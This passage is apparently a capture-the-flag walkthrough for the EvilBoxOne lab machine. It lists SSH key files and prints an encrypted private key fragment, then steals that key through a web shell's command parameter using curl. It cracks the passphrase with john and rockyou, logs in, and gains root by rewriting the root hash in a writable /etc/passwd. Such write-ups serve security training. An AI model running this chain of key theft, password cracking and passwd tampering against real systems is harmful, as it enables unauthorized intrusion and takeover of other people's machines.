output >>>/root/.ssh/ssh_host_rsa_key.pub:
output >>>/home/mowree/.ssh/authorized_keys:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
output >>>/home/mowree/.ssh/identity:
output >>>/home/mowree/.ssh/identity.pub:
output >>>/home/mowree/.ssh/id_dsa:
output >>>/home/mowree/.ssh/id_dsa.pub:
output >>>/home/mowree/.ssh/id_rsa:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6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-----END RSA PRIVATE KEY-----
output >>>/home/mowree/.ssh/id_rsa.pub:
output >>>/home/mowree/.ssh/ssh_host_dsa_key:
output >>>/home/mowree/.ssh/ssh_host_dsa_key.pub:
output >>>/home/mowree/.ssh/ssh_host_key:
output >>>/home/mowree/.ssh/ssh_host_key.pub:
output >>>/home/mowree/.ssh/ssh_host_rsa_key:
output >>>/home/mowree/.ssh/ssh_host_rsa_key.pub:
Jackpot:
/home/mowree/.ssh/authorized_keys holds mowree's public key (shown above), and /home/mowree/.ssh/id_rsa holds the matching private key, in encrypted PEM form (Proc-Type: 4,ENCRYPTED, DEK-Info: DES-EDE3-CBC).
With mowree's public and private keys in hand, stealing the private key is enough to attack the SSH login.
Grab it with:
curl -s "http://192.168.56.117/secret/evil.php?command=/home/mowree/.ssh/id_rsa" -o id_rsa && chmod 600 id_rsa
Try logging in:
ssh mowree@192.168.56.117 -i id_rsa
-i specifies the private key to authenticate with
┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Enter passphrase for key 'id_rsa':
The key asks for a passphrase, so try cracking it with john.
- First convert the private key into a format john understands:
/usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa
- Crack it:
john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
If rockyou.txt is missing, extract rockyou.txt.gz first:
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
┌──(kali㉿kali)-[~/workspace]
└─$ john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (./id_rsa)
1g 0:00:00:00 DONE (2022-11-10 19:22) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- The passphrase is unicorn
┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Login successful; on to the next step.
Privilege escalation
Exploring the home directory turns up the first flag:
mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
We still need to escalate to root.
- sudo -l: nothing usable
- kernel version: no workable kernel exploit either
- look for files we can write to that we should not be able to, starting with the configuration directories:
find / -writable 2>/dev/null | grep 'etc'
mowree@EvilBoxOne:~$ find / -writable 2>/dev/null | grep 'etc'
/etc/passwd
/etc/passwd again. If this file is writable, any user's password can be overwritten outright: pam_unix only consults /etc/shadow when the password field of the entry is x, so a hash placed directly in that field is what gets checked.
Pick a password, 123, and generate a hash with openssl passwd -1:
$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/
Edit /etc/passwd so the root entry reads:
root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash
Then switch user with su root:
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# id
uid=0(root) gid=0(root) grupos=0(root)
Result:
root@EvilBoxOne:/home/mowree# ls
user.txt
root@EvilBoxOne:/home/mowree# cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
GAME OVER